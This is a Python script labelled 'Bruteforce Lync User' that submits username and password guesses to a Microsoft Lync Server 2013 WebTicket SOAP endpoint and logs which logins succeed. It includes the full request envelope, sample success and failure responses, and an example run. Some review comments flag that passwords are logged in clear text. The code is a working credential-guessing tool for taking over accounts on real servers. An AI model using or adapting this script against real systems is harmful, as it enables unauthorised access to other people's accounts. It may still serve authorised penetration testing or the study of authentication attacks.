#!/usr/bin/python
# -*- coding: utf-8 -*-
# Purpose: Bruteforce Lync User.
# Product: Microsoft Lync Server 2013
# Author : Nixawk
import requests
import base64
import logging
# Module-wide logger used by lync_login; the root logger is configured for
# INFO and above so the outcome of each attempt is emitted.
log = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
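def lync_login(indexURI, username, password):
    """Submit one username/password pair to a Lync WebTicket service.

    Builds a WS-Trust ``RequestSecurityToken`` SOAP envelope carrying a
    ``UsernameToken`` and POSTs it to
    ``<indexURI>/WebTicket/WebTicketService.svc/Auth``.

    Args:
        indexURI: Base URI of the Lync pool, e.g. https://lyncpool.example.com
        username: Account name to present.
        password: Password to present.

    Returns:
        True if the server answered HTTP 200 with a
        ``<RequestedSecurityToken>`` element in the body; False otherwise,
        including when the HTTP request itself fails.
    """
    # Local import: only the <Address> element needs XML escaping.
    from xml.sax.saxutils import escape

    def _b64(value):
        # b64encode needs bytes; accept text too so the call also works on
        # Python 3, where str and bytes are distinct types.
        if not isinstance(value, bytes):
            value = value.encode("utf-8")
        return base64.b64encode(value).decode("ascii")

    is_valid = False
    sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI

    # The password travels as PasswordText, only base64-encoded. That is an
    # encoding, not encryption, so confidentiality on the wire depends on
    # indexURI being an https:// endpoint.
    # NOTE(review): Context and the Created/Expires timestamps are fixed
    # values from a 2017 request; whether the server validates them is not
    # visible here - confirm.
    envelope = "".join([
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">',
        '<s:Header>',
        '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">',
        '<UsernameToken>',
        '<Username>%s</Username>' % _b64(username),
        '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % _b64(password),
        '</UsernameToken>',
        '</Security>',
        '</s:Header>',
        '<s:Body>',
        '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">',
        '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>',
        '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">',
        '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">',
        # Escape the URI so characters such as '&' or '<' cannot produce a
        # malformed envelope.
        '<Address>%s</Address>' % escape(sapi),
        '</EndpointReference>',
        '</AppliesTo>',
        '<Lifetime>',
        '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>',
        '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>',
        '</Lifetime>',
        '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>',
        '</RequestSecurityToken>',
        '</s:Body>',
        '</s:Envelope>',
    ])

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "text/xml",
        "SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue",
        "Referer": "%s/Dialin/Conference.aspx" % indexURI,
    }

    try:
        # The context manager releases the connection pool on exit. The
        # timeout keeps an unresponsive host from blocking the call forever.
        # Certificate verification stays at the requests default (enabled).
        with requests.Session() as sess:
            response = sess.post(sapi, headers=headers, data=envelope, timeout=30)

            # NOTE(review): both records below write the submitted password
            # in clear text; treat the log destination as sensitive or drop
            # that field.
            if response.status_code == 200 and "<RequestedSecurityToken>" in response.text:
                log.info("%s/%s - login successfully !", username, password)
                is_valid = True
            log.info("%s/%s - login status: %s", username, password, response.status_code)
    except requests.RequestException as err:
        # Connection, TLS, timeout and malformed-URL errors all land here;
        # the attempt is reported as not valid.
        log.exception(str(err))

    return is_valid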
# Error Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope>
# Success Response:
# <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope>
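if __name__ == '__main__':
    import sys

    # Exactly three arguments are expected: base URI, account name, password.
    # NOTE(review): a password given on the command line is visible in the
    # process list and shell history of the machine running this check.
    if len(sys.argv) != 4:
        print("[*] python %s <lync URI> <user@domain> <password>" % sys.argv[0])
        # A wrong invocation is an error, so do not report success to the shell.
        sys.exit(1)

    # indexURI = "https://lyncpool.example.com"
    indexURI = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    lync_login(indexURI, username, password)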
## References
# https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources
# https://ucwa.skype.com/documentation/keytasks-createapplication
# https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa
$ python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "[email protected]/" "password"
INFO:__main__:[email protected]/password - login successfully !
INFO:__main__:[email protected]/password - login status: 200